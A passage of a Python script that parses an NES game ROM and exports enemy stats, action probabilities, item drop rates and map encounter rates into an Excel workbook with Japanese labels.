3:\n assert enemy.mahuuji_effectiveness == 0\n mahuuji_tern_count = \"-\"\n else:\n mahuuji_tern_count = tern_bucket[enemy.mahuuji_effectiveness]\n lullaby_endurance = debuff_endurance[enemy.lullaby_endurance]\n if enemy.lullaby_endurance == 3:\n assert enemy.lullaby_effectiveness == 0\n lullaby_tern_count = \"-\"\n else:\n lullaby_tern_count = tern_bucket[enemy.lullaby_effectiveness]\n parapa_endurance = debuff_endurance[enemy.parapa_endurance]\n if enemy.parapa_endurance == 3:\n assert enemy.parapa_effectiveness == 0\n parapa_tern_count = \"-\"\n else:\n parapa_tern_count = tern_bucket[enemy.parapa_effectiveness]\n row = [\n enemy_id,\n enemy_name.enemy_name.strip(),\n _get_chapter_name_of_enemy(enemy_id),\n enemy.hp,\n enemy.min_hp,\n enemy.max_hp,\n enemy.cp,\n enemy.attack,\n enemy.defense,\n enemy.speed,\n enemy.money,\n enemy.experience,\n escapable[enemy.escapable],\n attack_twice[enemy.attack_twice],\n hittability[enemy.hittability],\n mihagito_endurance[enemy.mihagito_endurance],\n kurusu_endurance[enemy.kurusu_endurance],\n beto_endurance[enemy.beto_endurance],\n choriki_endurance[enemy.choriki_endurance_1],\n choriki_endurance[enemy.choriki_endurance_2],\n choriki_endurance[enemy.choriki_endurance_3_4],\n choriki_endurance[enemy.choriki_endurance_5],\n choriki_endurance[enemy.choriki_endurance_6],\n mahuuji_endurance,\n mahuuji_tern_count,\n lullaby_endurance,\n lullaby_tern_count,\n parapa_endurance,\n parapa_tern_count,\n ]\n enemy_action_pattern = 
_get_enemy_action_pattern(prg_rom_bytes, enemy.action_pattern_id)\n action_threshold_by_action_id = _aggregate_enemy_action_pattern(enemy_action_pattern)\n sorted_actions = sorted(action_threshold_by_action_id.items(), key=operator.itemgetter(1), reverse=True)\n for i in range(_MAX_ACTIONS_PER_ENEMY):\n if i < len(sorted_actions):\n (action_id, threshold) = sorted_actions[i]\n action_name = _get_action_name(prg_rom_bytes, action_id).action_name.strip()\n row.append(action_name)\n row.append(f\"{round(threshold / (0x100 * 2) * 100, 2):.02f}% ({threshold} / {0x100 * 2})\")\n else:\n row.append(\"-\")\n row.append(\"-\")\n item_drop_pattern = _get_item_drop_pattern(prg_rom_bytes, enemy.item_drop_pattern_id)\n has_drop_item = False\n if item_drop_pattern.drop_item_id_0 == 0:\n row.append(\"-\")\n else:\n has_drop_item = True\n row.append(_get_item_name(prg_rom_bytes, item_drop_pattern.drop_item_id_0).item_name.strip())\n if item_drop_pattern.drop_item_id_1 == 0:\n assert not has_drop_item\n row.append(\"-\")\n else:\n assert has_drop_item\n has_drop_item = True\n row.append(_get_item_name(prg_rom_bytes, item_drop_pattern.drop_item_id_1).item_name.strip())\n if not has_drop_item:\n row.append(\"-\")\n elif item_drop_pattern.item_drop_threshold == 0:\n row.append(\"100.00%\")\n else:\n row.append(f\"{round(item_drop_pattern.item_drop_threshold / 0x100 * 100, 2):.02f}% ({item_drop_pattern.item_drop_threshold} / {0x100})\")\n row.append(note_by_enemy_id.get(enemy_id, \"-\"))\n rows.append(row)\n\n def _get_sort_key(row: List[Any]) -> Tuple[int, int]:\n enemy_id = row[0]\n enemy_chapter_priority = [\n \"1の巻\",\n \"2の巻\",\n \"3の巻\",\n \"4の巻\",\n \"5の巻\",\n \"6の巻\",\n \"7の巻\",\n \"8の巻\",\n \"9の巻\",\n \"10の巻\",\n \"オニガランド\",\n \"オーロラ王国\",\n \"ボス\",\n \"不明\",\n ].index(row[2])\n return (enemy_chapter_priority, enemy_id)\n\n for row in sorted(rows, key=_get_sort_key):\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _get_encounter_threshold(prg_rom_bytes: bytes, encounter_threshold_id: int) -> int:\n assert 0 <= encounter_threshold_id <= 7\n if encounter_threshold_id == 0:\n return 0\n return prg_rom_bytes[0x00FD7D + (encounter_threshold_id - 1)]\n\n\ndef _fill_map(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n description_by_map_id = {\n 0x0000: \"ワールドマップ\",\n 0x0001: \"オニガランドワールドマップ\",\n 0x0002: \"オーロラ王国ワールドマップ\",\n 0x0004: \"柳生の里\",\n 0x0008: \"尾張の町:奉行所1階\",\n 0x0009: \"尾張の町:奉行所地下牢\",\n 0x0025: \"アザラシ村とゆきおとこ村の間の洞窟\",\n 0x0026: \"オーロラ村とアザラシ村の間の洞窟2\",\n 0x0028: \"浪速の都:越後屋への地下通路(左から右)\",\n 0x002A: \"なまず大明神:入り口の社\",\n 0x002B: \"なまず大明神:おおなまずのフロア\",\n 0x002C: \"からくり城:1階\",\n 0x002E: \"からくり城:地下1階牢屋\",\n 0x0030: \"柳生の里(江戸の町崩壊後)\",\n 0x0031: \"からくり城:入り口の細い通路\",\n 0x0035: \"柳生の里:但馬邸(江戸の町崩壊後)\",\n 0x003A: \"シードラゴン:縦に長い階段があるフロア\",\n 0x003B: \"シードラゴン:最下層(水の流れているフロア)\",\n 0x003C: \"シードラゴン:一番上の層の右の部屋・3番目の層の右の部屋(何も無い部屋)\",\n 0x003D: \"シードラゴン:乙姫の前の人が7人いる部屋\",\n 0x003E: \"シードラゴン:たつのこつかいのフロアの1つ前の宝箱が6個ある部屋\",\n 0x003F: \"シードラゴン:うつぼうずのフロア\",\n 0x0040: \"龍宮からシードラゴンへの通路1\",\n 0x0041: \"シードラゴン:入ってすぐのフロア\",\n 0x0042: \"シードラゴン:最下層からうつぼうずの途中の部屋1\",\n 0x0043: \"龍宮\",\n 0x0044: \"シードラゴン:たつのこつかいのいる部屋\",\n 0x0045: \"シードラゴン:一番上の層の左の部屋・2番目の層の左の部屋(たるが2個ある部屋)\",\n 0x0047: \"シードラゴン:2番目の層の真ん中の部屋・3番目の層の左の部屋(たるが5個ある部屋)\",\n 0x0048: \"シードラゴン:2番目の層の右の部屋(うつぼのカギがある部屋)\",\n 0x004A: \"龍宮からシードラゴンへの通路2\",\n 0x004C: \"シードラゴン:最下層からうつぼうずの途中の部屋2\",\n 0x004D: \"シードラゴン:最下層からうつぼうずの途中の部屋3\",\n 0x004E: \"シードラゴン:最下層からうつぼうずの途中の部屋4\",\n 0x004F: \"シードラゴン:最下層からうつぼうずの途中の部屋5\",\n 0x0050: 
\"火炎城:フロア1(火炎城最初のフロア)\",\n 0x0051: \"暗闇城:地下4階(こうもりだゆうのフロア)\",\n 0x0053: \"龍の祠(さばのすけで龍宮の入り口を見つけるフロア)\",\n 0x0054: \"のろい城:2階\",\n 0x0056: \"火炎城:フロア2\",\n 0x0058: \"火炎城:フロア3\",\n 0x0059: \"火炎城:フロア4(横1列のフロア)\",\n 0x005A: \"氷結城:左の塔4階\",\n 0x005B: \"氷結城:右の塔4階\",\n 0x005C: \"イワンのだっしゅつ\",\n 0x005D: \"龍宮への入り口の次の真っ黒のフロア(じゅうべえ落下)\",\n 0x005F: \"シードラゴン:乙姫の部屋\",\n 0x0060: \"火炎城:フロア5\",\n 0x0061: \"暗闇城:地下1階(入ってすぐのフロア)\",\n 0x0062: \"暗闇城:地下2階\",\n 0x0063: \"暗闇城:地下3階(牢屋)\",\n 0x0064: \"暗闇城:地下2階(ヘルバットのフロア)\",\n 0x0065: \"浪速の都(からくり城攻略前の暗い状態)\",\n 0x0067: \"浪速の都:越後屋からからくり城への地下通路(下から上)\",\n 0x0068: \"飢餓城:1階\",\n 0x006B: \"浪速の都:���後屋\",\n 0x006E: \"飢餓城:2階\",\n 0x006F: \"飢餓城:3階(スフインツクのフロア)\",\n 0x0070: \"飢餓城:地下1階\",\n 0x0071: \"飢餓城:3階\",\n 0x0072: \"飢餓城:3階(ビッグカンカンからスフインツクの間の通路)\",\n 0x0073: \"飢餓城:4階(ツタンだいおうのフロア)\",\n 0x0074: \"飢餓城:ビッグカンカンのフロア\",\n 0x0076: \"氷結城:左の塔2階\",\n 0x0077: \"氷結城:左の塔3階\",\n 0x007B: \"氷結城:5階(メガトンコインを持っていると落ちてしまうところ)\",\n 0x007C: \"氷結城:だるまたいしのいるフロア\",\n 0x007D: \"氷結城:右の塔1階\",\n 0x007E: \"氷結城:右の塔3階\",\n 0x0083: \"かぶとがに大明神:入り口の社\",\n 0x0084: \"かぶとがに大明神:内部\",\n 0x0085: \"安芸の町\",\n 0x0086: \"伊予の町\",\n 0x0088: \"伊予の町から土佐の町への地下道\",\n 0x0089: \"宇宙(タコリアンのUFOでの移動画面)\",\n 0x008A: \"つちのこ大明神\",\n 0x008B: \"土佐の町(シードラゴン攻略前)\",\n 0x008D: \"のろい城:地下1階\",\n 0x008E: \"のろい城:1階(入ってすぐのフロア)\",\n 0x008F: \"のろい城:1階\",\n 0x0090: \"のろい城:3階(棺桶が多いフロア)・4階\",\n 0x0091: \"のろい城:5階(ゾンビまおうのフロア)\",\n 0x0092: \"のろい城:3階(牢屋のあるフロア)\",\n 0x0094: \"のろい城:ゾンビマシン\",\n 0x0097: \"岬の小屋(さばのすけのいるフロア)\",\n 0x0098: \"呉別府の渡し\",\n 0x0099: \"異人の町\",\n 0x009A: \"隼人の渡し\",\n 0x00A2: \"モンゴレンの町:あおいほんがあるフロア\",\n 0x00A5: \"オーロラ村とアザラシ村の間の洞窟1\",\n 0x00A6: \"黄金洞窟\",\n 0x00A8: \"ゆきおとこ村北のガンちゃんで岩を退けるフロア\",\n 0x00A9: \"浪速の都:越後屋の隠し通路部屋\",\n 0x00AC: \"未来城:左の塔上層1階\",\n 0x00AD: \"未来城:右の塔上層(最下層へ落下させられるフロア)\",\n 0x00AF: \"隠れ湯\",\n 0x00B0: \"富士山への地下通路\",\n 0x00B8: \"未来城:パームロケットが貰える部屋\",\n 0x00BD: \"ミロクの洞窟\",\n 0x00BE: \"未来城:外観(入ってすぐのフロア)\",\n 0x00C0: \"未来城:格納庫(床下パネルを調べながら進むフロアの途中にある上下に入り口のある部屋)\",\n 0x00C4: \"未来城:左の塔下層(左の塔入ってすぐのフロア)\",\n 0x00C5: \"未来城:左の塔最上階(ボスガンダー1のフロア)\",\n 0x00C9: \"未来城:中央の橋(パームロケットを使うフロア)\",\n 0x00CA: \"未来城:右の塔(上層から最下層への落下画面)\",\n 0x00CB: \"未来城:右の塔最下層(ボスガンダー2のフロア)\",\n 0x00CF: \"未来城:格納庫(ドールのカギを使い入ってすぐのフロア)\",\n 0x00D6: \"未来城:格納庫(床下パネルを調べながら進むフロア)\",\n 0x00DC: \"未来城:中央の塔(マインマスターのフロア)\",\n 0x00E0: \"未来城:中央の塔(マインマスターのフロアのひとつ前のフロア)\",\n 0x00E1: \"モモタロゾンビの城1階\",\n 0x00E2: \"モモタロゾンビの城2階\",\n 0x00E3: \"モモタロゾンビの城3階\",\n 0x00E5: \"オーロラ村:王宮\",\n 0x00E6: \"未来城:左の塔上層2階\",\n 0x00E7: \"未来城:左の塔上層3階\",\n 0x00E8: \"未来城:左の塔上層4階\",\n 0x00E9: \"未来城:左の塔上層5階\",\n 0x00EA: \"未来城:右の塔最上階\",\n 0x00EB: \"未来城:右の塔最上階-1階\",\n 0x00EC: \"ゆきおとこ村からクーラーの洞窟の間の洞窟\",\n 0x00ED: \"ゆきおとこ村\",\n 0x00EE: \"北の洞窟:入ってすぐのフロア\",\n 0x00EF: \"北の洞窟:2番目のフロア\",\n 0x00F0: \"オーロラ村\",\n 0x00F1: \"モモタロゾンビの城4階\",\n 0x00F2: \"モモタロゾンビの城5階\",\n 0x00F3: \"クーラーの洞窟:入ってすぐのフロア\",\n 0x00F4: \"クーラーの洞窟:メタルブロックのいるフロア\",\n 0x00F5: \"隠れ湯:みかづきの部屋\",\n 0x00F6: \"薩摩の町(火炎城攻略前)\",\n 0x00F7: \"薩摩の町(かえんだいおう戦後)\",\n 0x00F8: \"薩摩の町(かえんだいおう潜伏時)\",\n 0x00FC: \"安芸の町:かごちゃんの部屋\",\n 0x00FD: \"琉球の村\",\n 0x00FE: \"琉球の村から火炎城への地下道\",\n 0x0100: \"屋久島\",\n 0x0101: \"屋久島:杉の子大明神\",\n 0x0102: \"壱岐(天狗のいるフロ���)\",\n 0x0103: \"オロ島(シロのいるフロア)\",\n 0x0104: \"門司の村\",\n 0x0105: \"門司の村:鬼の涙を使う穴がある部屋\",\n 0x0106: \"門司の村:鬼の涙を使うフロア\",\n 0x0107: \"下関の村\",\n 0x010A: \"黄泉の洞窟:入ってすぐのフロア\",\n 0x010C: \"黄泉の洞窟:エイリアンドール跡地\",\n 0x010D: \"カムカムの渡し\",\n 0x010E: \"黄泉の洞窟:タコリアンのいるフロア\",\n 0x010F: \"プーサンの村\",\n 0x0110: \"暗闇城から黄泉の洞窟への地下通路\",\n 0x0111: \"異星の廃都\",\n 0x0112: \"長門の村\",\n 0x0113: \"コンコンの町\",\n 0x0116: \"ホルクロア:まがつたまがあるフロア\",\n 0x0117: \"白ウサギ大明神\",\n 0x0118: 
\"ジャンパイの町\",\n 0x011A: \"ポキン\",\n 0x011C: \"クーロン城:入ってすぐのフロア\",\n 0x011D: \"クーロン城:地下牢\",\n 0x011E: \"クーロン城:コスモトロンがあるフロア\",\n 0x011F: \"ソウレンの村\",\n 0x0121: \"シーサンプータ\",\n 0x0122: \"三里の長城\",\n 0x0123: \"モンゴレンの町\",\n 0x0125: \"ハルビンタの村\",\n 0x0127: \"からくり城(ワールドマップから入った場合;入り口が無い)\",\n 0x0128: \"コウモリ洞窟(しんかげがあるフロア)\",\n 0x012A: \"ウラジョスト\",\n 0x012C: \"ババロフの町\",\n 0x012D: \"青い石碑(ノルンのなみだを使うフロア)\",\n 0x012E: \"最果ての洞窟(イワンの埋まっているフロア)\",\n 0x012F: \"石狩の町\",\n 0x0130: \"北の神々の祠\",\n 0x0131: \"まりもの里\",\n 0x0133: \"函館の村\",\n 0x0134: \"りんご村\",\n 0x0135: \"イタコ村\",\n 0x0137: \"十和田の石碑\",\n 0x0138: \"なんぶの町\",\n 0x013C: \"氷結城:入り口\",\n 0x013D: \"のろい城:入り口\",\n 0x013E: \"あきんどタウン\",\n 0x013F: \"ミミズク大明神\",\n 0x0140: \"いけない渡し\",\n 0x0142: \"あわの村\",\n 0x0143: \"江戸の町\",\n 0x0146: \"エンディング:マインマスター戦後のフロア\",\n 0x0147: \"シバレンの村\",\n 0x0148: \"のろい城:5階からゾンビマシンの間の移動\",\n 0x014D: \"千里の長城\",\n 0x014E: \"富士山\",\n 0x014F: \"ホルクロア\",\n 0x0150: \"薩摩の町の右下の火山\",\n 0x0152: \"しろくま村\",\n 0x0156: \"アザラシ村\",\n 0x0158: \"シロ編エンディングのスギ\",\n 0x0159: \"北の洞窟:ガンちゃんがいるフロア\",\n 0x015A: \"ミミナリ島の祠1階\",\n 0x015B: \"ミミナリ島の祠2階(キンタロゾンビのフロア)\",\n 0x015C: \"トンカチ島の祠(チューリップ)\",\n 0x015D: \"トンカチ島の祠(チューリップで転送後)\",\n }\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"マップID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マップ説明\"),\n _ColumnStyle(caption=\"敵グループパターンリストID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵エンカウント確率\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for map_id in range(0, _MAP_ID_COUNT):\n map_data = _get_map(prg_rom_bytes, map_id)\n if map_id in (0x00, 0x01, 0x02):\n # 0x00: ワールドマップ\n # 0x01: オニガランドワールドマップ\n # 0x02: オーロラ王国ワールドマップ\n encounter_rate = \"移動先のマスの種類により変わる\"\n else:\n encounter_threshold = _get_encounter_threshold(prg_rom_bytes, map_data.encounter_threshold_id)\n encounter_rate = f\"{round(encounter_threshold / 0x100 * 100, 2):.02f}% ({encounter_threshold} / {0x100})\"\n row = [map_id, description_by_map_id.get(map_id, \"\"), map_data.enemy_group_pattern_list_id, encounter_rate]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _aggregate_enemy_action_pattern_ids(enemy_group_pattern_ids: Sequence[int]) -> Sequence[Tuple[int, int]]:\n return tuple((enemy_group_pattern_id, len(tuple(ids))) for enemy_group_pattern_id, ids in itertools.groupby(sorted(enemy_group_pattern_ids)))\n\n\ndef _fill_enemy_group_pattern_list(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"敵グループパターンリストID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵グループパターンID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵グループパターンリスト内確率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵合計数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ1敵名前\"),\n _ColumnStyle(caption=\"グループ1敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ2敵名前\"),\n _ColumnStyle(caption=\"グループ2敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ3敵名前\"),\n _ColumnStyle(caption=\"グループ3敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for enemy_group_pattern_list_id in range(0, _ENEMY_GROUP_PATTERN_LIST_ID_COUNT):\n enemy_group_pattern_list = _get_enemy_group_pattern_list(prg_rom_bytes, 
enemy_group_pattern_list_id)\n enemy_group_pattern_ids_count = _aggregate_enemy_action_pattern_ids(enemy_group_pattern_list.enemy_group_pattern_ids)\n sum_enemy_group_pattern_ids_count = sum(item[1] for item in enemy_group_pattern_ids_count)\n if sum_enemy_group_pattern_ids_count:\n for enemy_group_pattern_id, count in enemy_group_pattern_ids_count:\n row: List[Union[int, str]] = [\n enemy_group_pattern_list_id,\n enemy_group_pattern_id,\n ]\n rate = f\"{round(count / sum_enemy_group_pattern_ids_count * 100, 2):.02f}% ({count} / {sum_enemy_group_pattern_ids_count})\"\n row.append(rate)\n enemy_group_pattern = _get_enemy_group_pattern(prg_rom_bytes, enemy_group_pattern_id)\n row.append(enemy_group_pattern.enemy_group_size)\n row.append(enemy_group_pattern.enemy_group_0_size + enemy_group_pattern.enemy_group_1_size + enemy_group_pattern.enemy_group_2_size)\n if enemy_group_pattern.enemy_group_0_enemy_id is not None:\n enemy_0_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_0_enemy_id).enemy_name.strip()\n row.append(enemy_0_name)\n row.append(enemy_group_pattern.enemy_group_0_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n if enemy_group_pattern.enemy_group_1_enemy_id is not None:\n enemy_1_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_1_enemy_id).enemy_name.strip()\n row.append(enemy_1_name)\n row.append(enemy_group_pattern.enemy_group_1_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n if enemy_group_pattern.enemy_group_2_enemy_id is not None:\n enemy_2_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_2_enemy_id).enemy_name.strip()\n row.append(enemy_2_name)\n row.append(enemy_group_pattern.enemy_group_2_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n else:\n # No group patterns in the list.\n row = [\n enemy_group_pattern_list_id,\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n ]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _fill_world_map(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n description_by_prg_rom_address = {\n 0x00FCE7: \"ワールドマップ(森(木2本))\",\n 0x00FCE8: \"ワールドマップ(森(木1本))\",\n 0x00FCE9: \"ワールドマップ(??)\",\n 0x00FCEA: \"ワールドマップ(雪木(木1本))\",\n 0x00FCEB: \"ワールドマップ(山(茶色))\",\n 0x00FCEC: \"ワールドマップ(岩山(1マス;進入不可))\",\n 0x00FCED: \"ワールドマップ(雪山(1マス;進入不可))\",\n 0x00FCEE: \"ワールドマップ(平野(緑))\",\n 0x00FCEF: \"ワールドマップ(橋(上から下))\",\n 0x00FCF0: \"ワールドマップ(海(左側が橋の影;進入不可))\",\n 0x00FCF1: \"ワールドマップ(橋(左から右))\",\n 0x00FCF2: \"ワールドマップ(海(上側が橋の影;進入不可))\",\n 0x00FCF3: \"ワールドマップ(沼(緑))\",\n 0x00FCF4: \"ワールドマップ(水(岸なし;進入不可))\",\n 0x00FCF5: \"ワールドマップ(水(上側が岸;進入不可))\",\n 0x00FCF6: \"ワールドマップ(水(上側と左側が岸;進入不可))\",\n 0x00FCF7: \"ワールドマップ(水(左側が岸;進入不可))\",\n 0x00FCF8: \"ワールドマップ(??)\",\n 0x00FCF9: \"ワールドマップ(水(下側が岸;進入不可))\",\n 0x00FCFA: \"ワールドマップ(水(左側と下側が岸;進入不可))\",\n 0x00FCFB: \"ワールドマップ(水(下側と右側が岸;進入不可))\",\n 0x00FCFC: \"ワールドマップ(??)\",\n 0x00FCFD: \"ワールドマップ(水(左側が岸;進入不可))\",\n 0x00FCFE: \"ワールドマップ(水(右側が岸;進入不可))\",\n 0x00FCFF: \"ワールドマップ(水(上側と下側が岸;進入不可))\",\n 0x00FD00: \"ワールドマップ(水(左側と右側が岸;進入不可))\",\n 0x00FD01: \"ワールドマップ(平野(緑;下側が岸))\",\n 0x00FD02: \"ワールドマップ(砂漠)\",\n 0x00FD03: \"ワールドマップ(??)\",\n 0x00FD04: \"ワールドマップ(ヤシの木)\",\n 0x00FD05: \"ワールドマップ(??)\",\n 0x00FD06: \"ワールドマップ(城壁(進入不可))\",\n 0x00FD07: \"ワールドマップ(スギ(2マスの上))\",\n 0x00FD08: \"ワールドマップ(雪原)\",\n 0x00FD09: \"ワールドマップ(スギ(2マスの下))\",\n 0x00FD0A: \"ワールドマップ(雪原(下側が岸))\",\n 0x00FD0B: 
\"ワールドマップ(岩山(2マスの左;進入不可))\",\n 0x00FD0C: \"ワールドマップ(岩山(2マスの右;進入不可))\",\n 0x00FD0D: \"ワールドマップ(町(2マス;左))\",\n 0x00FD0E: \"ワールドマップ(町(2マス;右))\",\n 0x00FD0F: \"ワールドマップ(洞窟(はしご))\",\n 0x00FD10: \"ワールドマップ(鳥居)\",\n 0x00FD11: \"ワールドマップ(町(1マス))\",\n 0x00FD12: \"ワールドマップ(氷結城(4マス;左上))\",\n 0x00FD13: \"ワールドマップ(氷結城(4マス;右上))\",\n 0x00FD14: \"ワールドマップ(氷結城(4マス;左下))\",\n 0x00FD15: \"ワールドマップ(氷結城(4マス;右下))\",\n 0x00FD16: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;左上))\",\n 0x00FD17: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;右上))\",\n 0x00FD18: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;左下))\",\n 0x00FD19: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;右下))\",\n 0x00FD1A: \"ワールドマップ(町跡地)\",\n 0x00FD1B: \"オニガランド(森(木1本))\",\n 0x00FD1C: \"オニガランド(??)\",\n 0x00FD1D: \"オニガランド(平野(茶))\",\n 0x00FD1E: \"オニガランド(森(幹無し))\",\n 0x00FD1F: \"オニガランド(森(木2本))\",\n 0x00FD20: \"オニガランド(平野(緑))\",\n 0x00FD21: \"オニガランド(??)\",\n 0x00FD22: \"オニガランド(??)\",\n 0x00FD23: \"オニガランド(??)\",\n 0x00FD24: \"オニガランド(??)\",\n 0x00FD25: \"オニガランド(??)\",\n 0x00FD26: \"オニガランド(水(岸なし))\",\n 0x00FD27: \"オニガランド(水(上側が岸))\",\n 0x00FD28: \"オニガランド(水(上側と左側が岸))\",\n 0x00FD29: \"オニガランド(水(上側と右側が岸))\",\n 0x00FD2A: \"オニガランド(??)\",\n 0x00FD2B: \"オニガランド(水(下側が岸))\",\n 0x00FD2C: \"オニガランド(水(左側と下側が岸))\",\n 0x00FD2D: \"オニガランド(水(下側と右側が岸))\",\n 0x00FD2E: \"オニガランド(??)\",\n 0x00FD2F: \"オニガランド(水(左側が岸))\",\n 0x00FD30: \"オニガランド(水(右側が岸))\",\n 0x00FD31: \"オニガランド(水(上側と下側が岸))\",\n 0x00FD32: \"オニガランド(水(左側と右側が岸))\",\n 0x00FD33: \"オニガランド(平野(茶;下側が岸))\",\n 0x00FD34: \"オニガランド(トゲ)\",\n 0x00FD35: \"オニガランド(溶岩)\",\n 0x00FD36: \"オニガランド(??)\",\n 0x00FD37: \"オニガランド(??)\",\n 0x00FD38: \"オニガランド(??)\",\n 0x00FD39: \"オニガランド(??)\",\n 0x00FD3A: \"オニガランド(??)\",\n 0x00FD3B: \"オニガランド(??)\",\n 0x00FD3C: \"オニガランド(??)\",\n 0x00FD3D: \"オニガランド(??)\",\n 0x00FD3E: \"オニガランド(??)\",\n 0x00FD3F: \"オニガランド(??)\",\n 0x00FD40: \"オニガランド(??)\",\n 0x00FD41: \"オニガランド(??)\",\n 0x00FD42: \"オニガランド(??)\",\n 0x00FD43: \"オニガランド(??)\",\n 0x00FD44: \"オニガランド(??)\",\n 0x00FD45: \"オニガランド(??)\",\n 0x00FD46: \"オニガランド(??)\",\n 0x00FD47: \"オニガランド(??)\",\n 0x00FD48: \"オニガランド(??)\",\n 0x00FD49: \"オニガランド(??)\",\n 0x00FD4A: \"オニガランド(??)\",\n 0x00FD4B: \"オニガランド(??)\",\n 0x00FD4C: \"オニガランド(??)\",\n 0x00FD4D: \"オニガランド(??)\",\n 0x00FD4E: \"オーロラ王国(雪原)\",\n 0x00FD4F: \"オーロラ王国(雪原(下側が岸))\",\n 0x00FD50: \"オーロラ王国(??)\",\n 0x00FD51: \"オーロラ王国(??)\",\n 0x00FD52: \"オーロラ王国(??)\",\n 0x00FD53: \"オーロラ王国(??)\",\n 0x00FD54: \"オーロラ王国(土)\",\n 0x00FD55: \"オーロラ王国(??)\",\n 0x00FD56: \"オーロラ王国(??)\",\n 0x00FD57: \"オーロラ王国(??)\",\n 0x00FD58: \"オーロラ王国(??)\",\n 0x00FD59: \"オーロラ王国(??)\",\n 0x00FD5A: \"オーロラ王国(??)\",\n 0x00FD5B: \"オーロラ王国(??)\",\n 0x00FD5C: \"オーロラ王国(??)\",\n 0x00FD5D: \"オーロラ王国(??)\",\n 0x00FD5E: \"オーロラ王国(??)\",\n 0x00FD5F: \"オーロラ王国(??)\",\n 0x00FD60: \"オーロラ王国(??)\",\n 0x00FD61: \"オーロラ王国(??)\",\n 0x00FD62: \"オーロラ王国(??)\",\n 0x00FD63: \"オーロラ王国(??)\",\n 0x00FD64: \"オーロラ王国(土(下側が岸))\",\n 0x00FD65: \"オーロラ王国(??)\",\n 0x00FD66: \"オーロラ王国(??)\",\n 0x00FD67: \"オーロラ王国(階段)\",\n 0x00FD68: \"オーロラ王国(??)\",\n 0x00FD69: \"オーロラ王国(??)\",\n 0x00FD6A: \"オーロラ王国(??)\",\n 0x00FD6B: \"オーロラ王国(??)\",\n 0x00FD6C: \"オーロラ王国(??)\",\n 0x00FD6D: \"オーロラ王国(??)\",\n 0x00FD6E: \"オーロラ王国(??)\",\n 0x00FD6F: \"オーロラ王国(??)\",\n 0x00FD70: \"オーロラ王国(??)\",\n 0x00FD71: \"オーロラ王国(??)\",\n 0x00FD72: \"オーロラ王国(??)\",\n 0x00FD73: \"オーロラ王国(??)\",\n 0x00FD74: \"オーロラ王国(??)\",\n 0x00FD75: \"オーロラ王国(??)\",\n 0x00FD76: \"オーロラ王国(??)\",\n 0x00FD77: \"オーロラ王国(??)\",\n 0x00FD78: \"オーロラ王国(??)\",\n 0x00FD79: \"オーロラ王国(??)\",\n 0x00FD7A: \"オーロラ王国(??)\",\n 0x00FD7B: \"オーロラ王国(??)\",\n 0x00FD7C: \"オーロラ王国(??)\",\n }\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"マップ説明・マス説明\"),\n 
_ColumnStyle(caption=\"敵エンカウント確率\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for prg_rom_address in range(0x00FCE7, 0x00FD7C + 1):\n encounter_threshold_id = prg_rom_bytes[prg_rom_address]\n encounter_threshold = _get_encounter_threshold(prg_rom_bytes, encounter_threshold_id)\n encounter_rate = f\"{round(encounter_threshold / 0x100 * 100, 2):.02f}% ({encounter_threshold} / {0x100})\"\n row = [description_by_prg_rom_address[prg_rom_address], encounter_rate]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input_ines_file_path\", type=str)\n parser.add_argument(\"output_excel_file_path\", type=str)\n args = parser.parse_args()\n\n prg_rom_bytes = _read_prg_rom(args.input_ines_file_path)\n expected_prg_rom_crc = 0x29C61B41\n if binascii.crc32(prg_rom_bytes) != expected_prg_rom_crc:\n raise ValueError(\"Unexpected PRG ROM CRC\")\n\n workbook = openpyxl.Workbook()\n workbook.active.title = \"味方キャラステータス\"\n _fill_player_character(prg_rom_bytes, workbook.active)\n _fill_enemy(prg_rom_bytes, workbook.create_sheet(\"敵キャラステータス\"))\n _fill_map(prg_rom_bytes, workbook.create_sheet(\"マップ\"))\n 